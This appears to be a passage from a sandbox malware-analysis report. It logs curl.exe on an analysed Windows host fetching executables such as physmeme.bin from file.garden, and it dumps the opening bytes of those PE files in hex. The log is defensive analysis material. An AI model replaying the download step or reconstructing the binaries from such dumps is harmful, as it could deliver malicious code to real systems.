                                                                                                                                                                                                                                                                                    Content-Length: 233472
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                    content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                                                                                                    last-modified: Tue, 24 Sep 2024 14:17:45 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Age: 524684
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOLw%2BVchxsBv223JL72Q%2B8MXyz7pnrdJhgKHPTgckyDq%2BnignZ0b91DFpHetOkrVUGnZaARrK1Jxd5FmqgTgVPZFh7dkd9VUugF1HDVWWqEAp%2BHPzZ%2FF2oHLtDEMJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb589b67825436d-EWR
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC551INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 8e 91 8d 62 ef ff de 62 ef ff de 62 ef ff de 6b 97 6c de 70 ef ff de a1 6c fc df 66 ef ff de a1 6c fb df 68 ef ff de a1 6c fa df 43 ef ff de a1 6c fe df 64 ef ff de 29 97 fe df 69 ef ff de 62 ef fe de 79 ee ff de 71 6b f6 df 63 ef ff de 71 6b 00 de 63 ef ff de 71 6b fd df 63 ef ff de 52 69 63 68 62 ef ff de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$&bbbklplflhlCld)ibyqkcqkcqkcRichbPEd
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 60 2e 72 64 61 74 61 00 00 20 96 00 00 00 e0 02 00 00 98 00 00 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 3e 00 00 00 80 03 00 00 0c 00 00 00 64 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 48 18 00 00 00 c0 03 00 00 1a 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 e0 03 00 00 02 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 02 00 00 00 f0 03 00 00 04 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: `.rdata @@.data>d@.pdataHp@@.rsrc@@.reloc4@B
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: c8 66 44 0f 6f 05 46 e6 02 00 45 0f 29 4b b8 66 44 0f 6f 0d d8 e6 02 00 66 0f 7f 44 24 20 44 8b 44 24 20 45 0f 29 53 a8 66 44 0f 6f 15 3f e6 02 00 66 0f 6e e1 8d 41 04 66 0f 70 e4 00 66 41 0f fe e0 66 0f 6f d4 66 0f 6f cc 66 0f 6a cc 66 0f 62 d4 66 0f 6f c1 66 0f 38 28 c5 66 0f 6f da 66 0f 38 28 ce 66 0f 38 28 d6 66 0f 38 28 dd 0f c6 d1 dd 66 0f 6f cc 0f c6 d8 dd 66 0f fa d4 66 0f fe dc 66 0f 72 e2 06 66 0f 6f c2 66 0f 72 e3 06 66 0f 72 d0 1f 66 0f fe c2 66 41 0f 38 40 c1 66 0f fa c8 66 0f 6f c3 66 0f 72 d0 1f 0f 54 cf 66 0f fe c3 66 0f 67 c9 66 41 0f 38 40 c2 66 0f fa e0 66 0f 67 c9 0f 54 e7 66 41 0f 6e c0 66 0f 67 e4 66 0f 67 e4 66 0f fc cc 66 0f 6e e0 66 0f fc c8 66 0f 70 e4 00 66 0f 6e 42 fc 66 41 0f fe e0 0f 57 c8 66 0f 6f d4 66 0f 7e 4a fc 66 0f 6f
                                                                                                                                                                                                                                                                                    Data Ascii: fDoFE)KfDofD$ DD$ E)SfDo?fnAfpfAfofofjfbfof8(fof8(f8(f8(fofffrfofrfrffA8@ffofrTffgfA8@ffgTfAnfgfgffnffpfnBfAWfof~Jfo
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 00 48 8d 05 7f d0 02 00 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc 48 83 ec 28 48 8d 0d cd d0 02 00 ff 15 8f ca 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 40 48 8b 05 23 67 03 00 48 33 c4 48 89 44 24 30 48 8d 51 08 c6 44 24 28 01 48 8d 05 13 d0 02 00 48 8b d9 48 89 01 0f 57 c0 48 8d 05 03 d1 02 00 48 8d 4c 24 20 48 89 44 24 20 0f 11 02 ff 15 40 cb 02 00 48 8d 05 49 d6 02 00 48 89 03 48 8b c3 48 8b 4c 24 30 48 33 cc e8 ce 8f 02 00 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc 48 83 ec 48 48 8d 4c 24 20 e8 82 ff ff ff 48 8d 15 f3 33 03 00 48 8d 4c 24 20 e8 d5 9e 02 00 cc 40 53 48 83 ec 20 48 8b d9 48 8b c2 48 8d 0d 95 cf 02 00 0f 57 c0 48 8d 53 08 48 89 0b 48 8d 48 08 0f 11 02 ff 15 ce ca 02 00 48 8d 05 d7 d5 02 00 48 89 03 48 8b c3 48
                                                                                                                                                                                                                                                                                    Data Ascii: HHHH [H(H@SH@H#gH3HD$0HQD$(HHHWHHL$ HD$ @HIHHHL$0H3H@[HHHL$ H3HL$ @SH HHHWHSHHHHHHH
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 11 02 48 8d 4b 08 ff 15 5a c6 02 00 48 8d 05 5b d7 02 00 48 89 07 48 8b c7 0f 10 43 18 48 8b 5c 24 30 0f 11 47 18 48 83 c4 20 5f c3 cc cc 48 8b 09 e9 6c 85 02 00 cc cc cc cc cc cc cc cc 48 8d 05 69 cb 02 00 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 41 8b c8 48 8b da ff 15 e6 c4 02 00 0f 57 c0 49 c7 c0 ff ff ff ff 0f 11 03 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 90 49 ff c0 42 80 3c 00 00 75 f6 48 8b d0 48 8b cb e8 2b f3 01 00 48 8b c3 48 83 c4 30 5b c3 cc cc 40 53 48 83 ec 20 48 8b d9 f6 c2 01 74 0a ba 10 00 00 00 e8 78 8a 02 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 e1 ca 02 00 c3 cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 40 48 8b 05 1f 61 03 00 48 33 c4 48 89 44 24 38 48 8b da 48 89 54 24 28
                                                                                                                                                                                                                                                                                    Data Ascii: HKZH[HHCH\$0GH _HlHi@SH0AHWIHCHCIB<uHH+HH0[@SH HtxHH [HH\$WH@HaH3HD$8HHT$(
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 0c 02 00 8b c8 48 6b c1 1a 83 f8 15 77 1a 0f 1f 80 00 00 00 00 48 8b cf e8 d8 0c 02 00 8b c8 48 6b c1 1a 83 f8 16 72 ed 48 c1 e8 20 04 61 88 03 48 ff c3 48 3b de 75 c3 48 8b 5c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 58 0f 29 74 24 40 0f 28 f0 0f 54 05 5d d6 02 00 f2 0f 58 05 85 d5 02 00 0f 29 7c 24 30 44 0f 29 44 24 20 44 0f 28 c1 e8 fd 95 02 00 0f 28 f8 0f 28 c6 e8 fe 95 02 00 0f 28 f0 41 0f 28 c0 e8 da 95 02 00 f2 0f 59 f0 41 0f 28 c0 f2 0f 58 fe e8 cf 95 02 00 0f 28 74 24 40 f2 0f 5c f8 44 0f 28 44 24 20 0f 28 c7 0f 28 7c 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 41 56 48 83 ec 30 48 8b 05 c4 5b 03 00 48 33 c4 48 89 44 24 28 48 8b 19 48 8b ea
                                                                                                                                                                                                                                                                                    Data Ascii: HkwHHkrH aHH;uH\$8Ht$@H _HX)t$@(T]X)|$0D)D$ D((((A(YA(X(t$@\D(D$ ((|$0HXH\$Hl$Ht$ AVH0H[H3HD$(HH
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 01 00 0f 10 45 00 0f 29 44 24 70 4c 8b c0 48 8d 54 24 70 48 8d 4c 24 20 e8 af f1 ff ff 48 83 78 18 0f 76 03 48 8b 00 48 8d 0d 36 c0 02 00 48 89 0b 0f 57 c0 0f 11 43 08 48 89 44 24 70 c6 44 24 78 01 48 8d 53 08 48 8d 4c 24 70 ff 15 63 bb 02 00 48 8d 05 a4 cb 02 00 48 89 03 48 8b 54 24 38 48 83 fa 0f 76 35 48 ff c2 48 8b 4c 24 20 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 a7 bc 02 00 cc e8 e1 7f 02 00 0f 10 45 00 0f 11 43 18 48 8d 05 92 c3 02 00 48 89 03 48 8d 4b 28 48 8b d6 e8 e3 fd ff ff 90 0f 57 c0 0f 11 43 58 0f 11 43 48 33 c0 48 89 43 58 48 c7 43 60 07 00 00 00 66 89 43 48 0f 11 44 24 20 66 0f 6f 0d e8 cf 02 00 f3 0f 7f 4c 24 30 66 89 44 24 20 48 8b 43 08 48 8d 0d ba bf 02 00 48 85 c0 48 0f
                                                                                                                                                                                                                                                                                    Data Ascii: E)D$pLHT$pHL$ HxvHH6HWCHD$pD$xHSHL$pcHHHT$8Hv5HHL$ HHrH'HIH+HHvECHHHK(HWCXCH3HCXHC`fCHD$ foL$0fD$ HCHHH
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: c8 e8 1d 7b 02 00 48 8d 05 fe ba 02 00 48 89 73 38 48 c7 43 40 07 00 00 00 48 8d 4b 08 66 89 73 28 48 89 03 ff 15 f1 b5 02 00 40 f6 c7 01 74 0d ba 88 00 00 00 48 8b cb e8 e6 7a 02 00 48 8b 74 24 40 48 8b c3 48 8b 5c 24 38 48 83 c4 20 5f c3 ff 15 8d b7 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 57 48 83 ec 20 48 8b 91 80 00 00 00 48 8b d9 48 83 fa 0f 76 31 48 8b 49 68 48 ff c2 48 81 fa 00 10 00 00 72 1c 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f 87 d8 00 00 00 49 8b c8 e8 75 7a 02 00 33 ff 48 c7 83 80 00 00 00 0f 00 00 00 48 89 7b 78 40 88 7b 68 48 8b 53 60 48 83 fa 07 76 36 48 8b 4b 48 48 8d 14 55 02 00 00 00 48 81 fa 00 10 00 00 72 1c 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f 87 83 00 00 00 49 8b c8 e8
                                                                                                                                                                                                                                                                                    Data Ascii: {HHs8HC@HKfs(H@tHzHt$@HH\$8H _H\$WH HHHv1HIhHHrLAH'I+HAHIuz3HH{x@{hHS`Hv6HKHHUHrLAH'I+HAHI
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 83 c4 30 41 5e c3 cc cc cc cc 40 53 48 83 ec 20 48 8d 05 6b c3 02 00 48 8b d9 48 89 01 f6 c2 01 74 0a ba 38 00 00 00 e8 9e 75 02 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc 48 3b ca 0f 84 d6 00 00 00 48 89 6c 24 18 48 89 74 24 20 57 48 83 ec 20 48 89 5c 24 30 49 8b f8 4c 89 74 24 38 48 8b ea 45 33 f6 48 8b f1 66 90 48 85 f6 0f 84 8d 00 00 00 8b 56 08 83 ea 0a 74 6a 83 ea 01 74 65 83 ea 05 74 32 83 ea 02 74 19 83 fa 01 75 64 48 3b 7e 20 75 5e 83 7f 34 ff 75 03 89 57 34 49 8b fe eb 50 48 85 ff 74 0a 44 89 77 34 44 89 76 34 eb 41 48 8b fe eb 3c 48 85 ff 74 04 44 89 77 34 48 8b 5e 28 48 85 db 74 2a 90 48 8b 53 20 4c 8b c7 48 8b 4b 10 e8 60 ff ff ff 48 8b 5b 28 48 85 db 75 e7 eb 0e 48 8b 4e 20 45 33 c0 33 d2 e8 47 ff ff ff 48 8b 76 10 48 3b f5 0f 85 6a ff ff
                                                                                                                                                                                                                                                                                    Data Ascii: 0A^@SH HkHHt8uHH [H;Hl$Ht$ WH H\$0ILt$8HE3HfHVtjtet2tudH;~ u^4uW4IPHtDw4Dv4AH<HtDw4H^(Ht*HS LHK`H[(HuHN E33GHvH;j
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:01 UTC1369INData Raw: 00 ca 9a 3b 48 69 c2 00 36 6e 01 48 2b c8 48 69 c9 00 ca 9a 3b 49 8b c6 48 f7 e9 48 03 d1 48 c1 fa 18 48 8b c2 48 c1 e8 3f 48 03 c2 49 03 c0 eb 1b 48 99 48 f7 ff 48 69 c8 00 ca 9a 3b 48 69 c2 00 ca 9a 3b 48 99 48 f7 ff 48 03 c1 48 3b c3 0f 8d 64 09 00 00 89 74 24 28 0f 1f 84 00 00 00 00 00 44 8b 65 80 41 0f ba fc 1f 44 89 64 24 40 44 8b 6d 84 41 0f ba fd 1f 45 2b ec 48 8d 4d 60 41 83 fd ff 75 1c e8 07 f7 01 00 41 8d 75 01 45 8b fc 48 8d 4d 60 e8 f7 f6 01 00 8b c8 e9 a7 00 00 00 41 8d 7d 01 e8 e7 f6 01 00 44 8b f7 8b c8 49 0f af ce 8b c7 3b cf 73 23 f7 d8 33 d2 f7 f7 8b f2 8b c7 3b ca 73 15 48 8d 4d 60 e8 c1 f6 01 00 8b c8 49 0f af ce 3b ce 72 ed eb 02 8b f8 45 8b f4 48 8d 4d 60 e8 a7 f6 01 00 8b d7 48 89 54 24 38 8b c8 48 0f af ca 8b f7 45 8b fc 3b cf 73
                                                                                                                                                                                                                                                                                    Data Ascii: ;Hi6nH+Hi;IHHHHH?HIHHHi;Hi;HHHH;dt$(DeADd$@DmAE+HM`AuAuEHM`A}DI;s#3;sHM`I;rEHM`HT$8HE;s


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.1049711188.114.97.34437196C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC104OUTGET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: file.garden
                                                                                                                                                                                                                                                                                    User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:10 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    Content-Length: 370176
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                    content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                                                                                                    last-modified: Sun, 22 Sep 2024 19:01:04 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Age: 681453
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgEy%2BVgElZa95RxrinVgHIHFYgL37s1gUjl8eX9ltgNYiaJ9gTY3gjVXIIR7vSG%2FgLGYTcDJXTlqbcUnsWfbvb54meUIN5bZDvSw2h9uPLD1Lhtjb4VRoYCjNQAtPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb589eb28b219cf-EWR
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC557INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 b2 3f f9 71
                                                                                                                                                                                                                                                                                    Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ|m&.y;KR7Skm?8ID&!0%N!\\L^0\j|MM;*qUO!'%. dEuQ-w$IX0df$|(gEN3J*T?q
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 d2 f4 39 88
                                                                                                                                                                                                                                                                                    Data Ascii: [5CX",_:k$J48Q3e,|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%89
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 b0 74 46 63
                                                                                                                                                                                                                                                                                    Data Ascii: }> :?mQEB_|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~ctFc
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da f3 d4 39 4a
                                                                                                                                                                                                                                                                                    Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-9J
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d 05 a2 0e da
                                                                                                                                                                                                                                                                                    Data Ascii: B;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 c2 9d b4 7f
                                                                                                                                                                                                                                                                                    Data Ascii: ,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
